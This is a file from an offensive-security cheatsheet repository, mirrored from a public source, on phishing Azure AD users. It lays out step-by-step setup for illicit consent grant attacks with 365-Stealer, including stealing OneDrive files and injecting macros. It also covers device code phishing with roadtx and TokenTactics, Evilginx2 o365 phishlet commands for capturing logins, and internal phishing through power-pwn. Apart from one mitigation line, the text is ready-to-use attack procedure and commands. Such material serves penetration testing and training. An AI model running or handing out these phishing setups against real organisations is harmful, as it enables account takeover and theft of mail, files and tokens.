daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

azure-phishing.md (8643B)


      1 ---
      2 title: "Azure AD - Phishing"
      3 section: "Cloud"
      4 sectionSlug: "cloud"
      5 sourcePath: "docs/cloud/azure/azure-phishing.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cloud/azure/azure-phishing.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Azure AD - Phishing
     12 
     13 ## Illicit Consent Grant
     14 
     15 > The attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting consent to the application so that the attacker can gain access to the data that the target user has access to.
     16 
     17 :warning: All Office 365 users will be protected from app-based attacks now that publisher verification is generally available as they "will no longer be able to consent to new multi-tenant apps registered after November 8th, 2020 coming from unverified publishers".
     18 
     19 Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssignedToDefaultUserRole`
     20 
     21 * **Disable user consent** : Users cannot grant permissions to applications.
     22 * **Users can consent to apps from verified publishers or your organization, but only for permissions you select** : All users can only consent to apps that were published by a verified publisher and apps that are registered in your tenant
     23 * **Users can consent to all apps** : allows all users to consent to any permission which doesn't require admin consent.
     24 * **Custom app consent policy**
     25 
     26 ### Register Application
     27 
     28 1. Login to [https://portal.azure.com](https://portal.azure.com) > Azure Active Directory
     29 2. Click on **App registrations** > **New registration**
     30 3. Enter the Name for our application
     31 4. Under support account types select **"Accounts in any organizational directory (Any Azure AD directory - Multitenant)"**
     32 5. Enter the Redirect URL. This URL should be pointed towards our 365-Stealer application that we will host for hosting our phishing page. Make sure the endpoint is `https://<DOMAIN/IP>:<PORT>/login/authorized`.
     33 6. Click **Register** and save the **Application ID**
     34 
     35 ### Configure Application
     36 
     37 1. Click on `Certificates & secrets`
     38 2. Click on `New client secret` then enter the **Description** and click on **Add**.
     39 3. Save the **secret**'s value.
     40 4. Click on API permissions > Add a permission
     41 5. Click on Microsoft Graph > **Delegated permissions**
     42 6. Search and select the below mentioned permissions and click on Add permission
     43     * Contacts.Read
     44     * Mail.Read / Mail.ReadWrite
     45     * Mail.ReadBasic
     46     * Mail.Send
     47     * Notes.Read.All
     48     * Mailboxsettings.ReadWrite
     49     * Files.ReadWrite.All
     50     * User.ReadBasic.All
     51     * User.Read
     52 
     53 ### Setup 365-Stealer (Deprecated)
     54 
     55 :warning: Default port for 365-Stealer phishing is 443
     56 
     57 * Run XAMPP and start Apache
     58 * Clone 365-Stealer into `C:\xampp\htdocs\`
     59     * `git clone https://github.com/AlteredSecurity/365-Stealer.git`
     60 * Install the requirements
     61     * Python3
     62     * PHP CLI or Xampp server
     63     * `pip install -r requirements.txt`
     64 * Enable sqlite3 (Xampp > Apache config > php.ini) and restart Apache
     65 * Edit `C:/xampp/htdocs/yourvictims/index.php` if needed
     66     * Disable IP whitelisting `$enableIpWhiteList = false;`
     67 * Go to 365-Stealer Management portal > Configuration (`http://localhost:82/365-stealer/yourVictims`)
     68     * **Client Id** (Mandatory): This will be the Application(Client) Id of the application that we registered.
     69     * **Client Secret** (Mandatory): Secret value from the Certificates & secrets tab that we created.
     70     * **Redirect URL** (Mandatory): Specify the redirect URL that we entered during registering the App like `https://<Domain/IP>/login/authorized`
     71     * **Macros Location**: Path of macro file that we want to inject.
     72     * **Extension in OneDrive**: We can provide file extensions that we want to download from the victims account or provide `*` to download all the files present in the victims OneDrive. The file extensions should be comma separated like txt, pdf, docx etc.
     73     * **Delay**: Delay the request by specifying time in seconds while stealing
     74 * Create a Self Signed Certificate to use HTTPS
     75 * Run the application either click on the button or run this command : `python 365-Stealer.py --run-app`
     76     * `--no-ssl`: disable HTTPS
     77     * `--port`: change the default listening port
     78     * `--token`: provide a specific token
     79     * `--refresh-token XXX --client-id YYY --client-secret ZZZ`: use a refresh token
     80 * Find the Phishing URL: go to `https://<IP/Domain>:<Port>` and click on **Read More** button or in the console.
     81 
     82 ### Vajra
     83 
     84 > Vajra is a UI-based tool with multiple techniques for attacking and enumerating in the target's Azure environment. It features an intuitive web-based user interface built with the Python Flask module for a better user experience. The primary focus of this tool is to have different attacking techniques all at one place with web UI interfaces. - [TROUBLE-1/Vajra](https://github.com/TROUBLE-1/Vajra)
     85 
     86 **Mitigation**: Enable `Do not allow user consent` for applications in the "Consent and permissions menu".
     87 
     88 ### Roadtx
     89 
     90 * Use the authorization code flow in `roadtx` to get token
     91 
     92 ```ps1
     93 roadtx codeauth -c <app-id> -r msgraph -t <tenant-id> <0.A....> -ru 'https://<phish-app>/redir' -p <app-secret>
     94 ```
     95 
     96 ## Device Code Phishing
     97 
     98 * Using roadtool: `roadtx gettokens -u user@domain.lab --device-code`
     99 
    100     ```ps1
    101     roadtx.exe auth --device-code -c 29d9ed98-a469-4536-ade2-f981bc1d605e
    102     Requesting token for resource https://graph.windows.net
    103     To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code XXXXXXXXX to authenticate.
    104     ```
    105 
    106 * Using TokenTactics to request a token for Azure Graph API using a device code
    107 
    108     ```ps1
    109     Import-Module .\TokenTactics.psd1
    110     Get-AzureToken -Client Graph
    111     ```
    112 
    113 * Replace `<REPLACE-WITH-DEVCODE-FROM-TOKENTACTICS>` in the [phishing email](https://github.com/rvrsh3ll/TokenTactics/blob/main/resources/DeviceCodePhishingEmailTemplate.oft)
    114 * Leave TokenTactics running in the PowerShell window and send the phishing email
    115 * Targeted user will follow the link to [https://microsoft.com/devicelogin](https://microsoft.com/devicelogin) and complete the Device Code form
    116 * Enjoy your **access token** and **refresh token**
    117 
    118 ## Phishing with Evilginx2
    119 
    120 * Run [kgretzky/evilginx2](https://github.com/kgretzky/evilginx2) with o365 phishlet
    121 
    122     ```powershell
    123     PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets
    124     : config domain username.corp
    125     : config ip 10.10.10.10
    126     : phishlets hostname o365 login.username.corp
    127     : phishlets get-hosts o365
    128     ```
    129 
    130 * Create a DNS entry type A for `login.login.username.corp` and `www.login.username.corp`, pointing to your machine
    131 * Copy certificate and enable the phishing
    132 
    133     ```ps1
    134     PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\ca.crt C:\Users\Username\.evilginx\crt\login.username.corp\o365.crt
    135     PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\private.key C:\Users\Username\.evilginx\crt\login.username.corp\o365.key
    136     : phishlets enable o365
    137 
    138     # get the phishing URL
    139     : lures create o365
    140     : lures get-url 0
    141     ```
    142 
    143 ### Internal Phishing - Power Platform
    144 
    145 > Set up an internal phishing application on a Microsoft-owned domains which will automatically authenticate as users browse to your link.
    146 
    147 * Install [mbrg/power-pwn](https://github.com/mbrg/power-pwn) - An offensive and defensive security toolset for Microsoft 365 Power Platform
    148 
    149     ```ps1
    150     pip install powerpwn
    151     ```
    152 
    153 * Install the application: `powerpwn phishing install-app -t {tenant-id} -e {environment-id} --input {path to application package zip} -n {application name}`
    154 * Share application with org: `powerpwn phishing share-app -t {tenant-id} -e {environment-id} -a {app id}`
    155 
    156 ## References
    157 
    158 * [Introduction To 365-Stealer - Understanding and Executing the Illicit Consent Grant Attack](https://www.alteredsecurity.com/post/introduction-to-365-stealer)
    159 * [Learn with @trouble1_raunak: Cloud Pentesting - Azure (Illicit Consent Grant Attack) - trouble1_raunak - Jun 6, 2021](https://www.youtube.com/watch?v=51FSvndgddk&list=WL)
    160 * [The Art of the Device Code Phish - Bobby Cooke - July 12, 2021](https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html)
    161 * [Power Pwn - Black Hat Arsenal 2023 - Aug 24, 2023](https://www.youtube.com/watch?v=LpdckZyBwvs)
    162 * [Low Code High Risk - Enterprise Domination via Low Code Abuse - Defcon 30 - Oct 20, 2022](https://www.youtube.com/watch?v=D3A62Rzozq4)
    163 * [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)